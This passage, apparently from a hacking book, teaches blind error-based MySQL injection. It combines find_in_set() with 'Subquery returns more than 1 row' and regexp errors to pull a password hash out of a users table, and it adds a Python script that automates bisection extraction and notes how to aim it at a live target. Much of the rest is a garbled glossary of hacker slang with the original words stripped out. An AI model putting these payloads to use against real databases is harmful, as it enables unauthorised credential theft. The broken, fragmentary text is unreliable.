only works while the result stays inside the range of existing items.
find_in_set() + more1row

The technique below, found by Elekt, combines find_in_set() with error-based inference for the case where there is no visible output at all, i.e. a blind SQL injection. Two MySQL errors are used. The first, "more1row" (found by podkashey):
SELECT 1 UNION SELECT 2
used as a scalar subquery gives
Subquery returns more than 1 row
The second, found by ZaCo, comes from the regexp library:
"" regexp concat("{1,25", if(@@version<>5, "}", "6}"))
/*
else
*/
which on MySQL 5 produces
#1139 - Got error 'invalid repetition count(s)' from regexp
because a repetition count above 255 ({1,256}) is invalid while {1,25} is fine. An error is raised only when the branch of the if() that contains it is evaluated, so the error returned by the server tells which branch ran. The regexp library can be provoked into several other errors the same way (the second branch of each if() is the harmless SELECT 1):
select if(1=1,(select 1 union select 2),2)
#1242 - Subquery returns more than 1 row
select 1 regexp if(1=1,"x{1,0}",2)
#1139 - Got error 'invalid repetition count(s)' from regexp
select 1 regexp if(1=1,"x{1,(",2)
#1139 - Got error 'braces not balanced' from regexp
select 1 regexp if(1=1,"[[:]]",2)
#1139 - Got error 'invalid character class' from regexp
select 1 regexp if(1=1,"[",2)
#1139 - Got error 'brackets ([ ]) not balanced' from regexp
select 1 regexp if(1=1,"(({1}",2)
#1139 - Got error 'repetition-operator operand invalid' from regexp
select 1 regexp if(1=1,"()",2)
#1139 - Got error 'empty (sub)expression' from regexp
select 1 regexp if(1=1,"(",2)
#1139 - Got error 'parentheses not balanced' from regexp
select 1 regexp if(1=1,"[2-1]",2)
#1139 - Got error 'invalid character range' from regexp
select 1 regexp if(1=1,"[[.ch.]]",2)
#1139 - Got error 'invalid collating element' from regexp
select 1 regexp if(1=1,"\\",2)
#1139 - Got error 'trailing backslash (\)' from regexp
Now add find_in_set(). If the character is in the list, find_in_set() returns a non-zero position; otherwise 0. So:
select * from users where id=1 AND "x" regexp concat("x{1,25", if(find_in_set(substring((select passwd from users where id=1),1,1),'a,b,c,d,e,f,1,2,3,4,5,6')>0, (select 1 union select 2), "6}"))
If the first character of the hash is one of 'a,b,c,d,e,f,1,2,3,4,5,6' the server answers
#1242 - Subquery returns more than 1 row
otherwise
#1139 - Got error 'invalid repetition count(s)' from regexp
Each request thus answers one yes/no question about a whole set of characters, and the alphabet can be cut in half with every request.
15- ,
[0-9, -f]. ,
12 (11 , ). , :
[1] '0'
[2] '1'
[3] '2'
[4] '3'
[5] '4'
[6] '5'
[7] '6'
[8] '7'
[9] '8'
[10] '9'
, ,
, .
2- 11-,
. 1,
-
:
[1] '0
[2] *
[3] '
[4] 'd
[5] '
[6] f
SQL .
1. .
2. ,
.
3. , ,
, ,
1.
, , ,
[a-z, A-Z, 0-9] 11
.
,
,
,
.
, 42 md5-x3m.
:
;
.
, ,
.
.
,
. 11 ,
,
. I!
, (,
, ).
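The bisection described in this section, as an added Python example (not code from the book or from its authors): build_payload produces the injected condition of the text for a given position and candidate list, and extract_char halves the hex alphabet on each request, so a 32-character md5 hash costs 4 requests per character, 128 in all. There is no server here, so query is a function argument and FakeMySQL is a constructed stand-in that evaluates the condition on a secret hash and returns the MySQL error text a real one would print; against a live target, query would send the payload and return the error shown on the page.

```python
import re

HEX = "0123456789abcdef"

# The two MySQL errors the payload relies on
MORE1ROW = "#1242 - Subquery returns more than 1 row"
BADREGEX = "#1139 - Got error 'invalid repetition count(s)' from regexp"


def build_payload(pos, charset):
    """Condition injected into the WHERE clause, as in the text: the subquery
    (select 1 union select 2) is evaluated, and #1242 raised, only if the
    character at position pos of the hash is in charset; otherwise the regexp
    x{1,256} is assembled and #1139 raised."""
    return ('"x" regexp concat("x{1,25", if(find_in_set(substring((select passwd '
            'from users where id=1),%d,1),\'%s\')>0, (select 1 union select 2), "6}"))'
            % (pos, ",".join(charset)))


class FakeMySQL:
    """Constructed stand-in for the injectable page: it reads pos and the character
    list back out of the payload, evaluates the condition on a secret hash and
    answers with the error text a real server would print."""

    def __init__(self, secret):
        self.secret = secret
        self.requests = 0

    def query(self, payload):
        self.requests += 1
        m = re.search(r"\),(\d+),1\),'([0-9a-f,]+)'\)", payload)
        pos, charset = int(m.group(1)), m.group(2).split(",")
        return MORE1ROW if self.secret[pos - 1] in charset else BADREGEX


def extract_char(query, pos):
    """Bisect the alphabet: one request halves the candidate set, so a hex
    character costs 4 requests instead of up to 15 equality tests."""
    cands = list(HEX)
    while len(cands) > 1:
        half = cands[:len(cands) // 2]
        if query(build_payload(pos, half)) == MORE1ROW:
            cands = half
        else:
            cands = cands[len(half):]
    return cands[0]


def extract_hash(query, length=32):
    """query(payload) -> error text of the response."""
    return "".join(extract_char(query, p) for p in range(1, length + 1))


if __name__ == "__main__":
    db = FakeMySQL("5f4dcc3b5aa765d61d8327deb882cf99")  # md5("password"), constructed
    print(extract_hash(db.query), db.requests)
```

The same loop serves any known alphabet: replace HEX with the 62 characters of [a-zA-Z0-9] and a character costs six requests instead of four.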
0-day (zero-day exploit)
jtr (John the Ripper)
(abend, aborption end) ,
(abort) () ,
^ (abuse)
,
,
.
(admin) ,
. .
(account) , ,
. .
(, ) ICQ (--), .
, (black hat) , ,
(Windows)
(white hat)
, .
,
, , .
(Denial of Service, DoS)
(Java)
(JavaScript)
DoS-attack.
(inject)
, . .
(include)
(inclutliiiK)
. (include)
<, ,
,
(inject ion)
* ,
) , * ,
, .
.
() (keyboard)
' (1)
'
(code) , -
.
(coding) .
.
(core) .
netcat.
(crack) , -
.
(cool hacker) (
).
(lamer) , ;
, .
(.) Linux.
(log) (
).
(log-wiper) , (. ).
(login) .
.
( must die) - , ; MS Windows.
(malware) .
. .
(manual) ( -,
).
(must have) - ,
.
, ,
(mIRC) ,
.
MySQL.
(mail) , e-mail.
.
.
netcat ().
(nick, nickname) .
Unix- .
( null)
, , 6; * ,
- (mdl-byle, by to)
(nuke)
, .
. .
(<)S)
( public nplo.it) , ,
I , -day sploit.
(pass, password)
,
Python Python.
( )S/2 (|> I (
).
( to root)
,
( use)
( use)
, .
, -.
P IIP .
(root)
*nix .
root.
SunOS.
, (secure)
. .
<', .
(script kiddie)
-,
, , ,.
.
. .
SQL.
, (sniffer)
cookie).
, - (,
, - Solaris,
(soft) , ,
,
.
, (sploit) .
.
. .
ICQ (. ).
(tips) , .
(tricks) ( ).
. .
.
., . .
Linux ( ),
(user identification number, UIN) ICQ.
, .
(Frequently Asked Questions, FAQ)
.
(phishing)
.
, (flood) ,
FreeBSD,
. .
(hack) .
& (hacking) ,
-.
.
. .
(host) , , ,
,
,
. .
- (Internet worm), .
(shell) .
IC O ,
.
(exploit) ,
.
( use) , . , . .
. .
(user) .
. .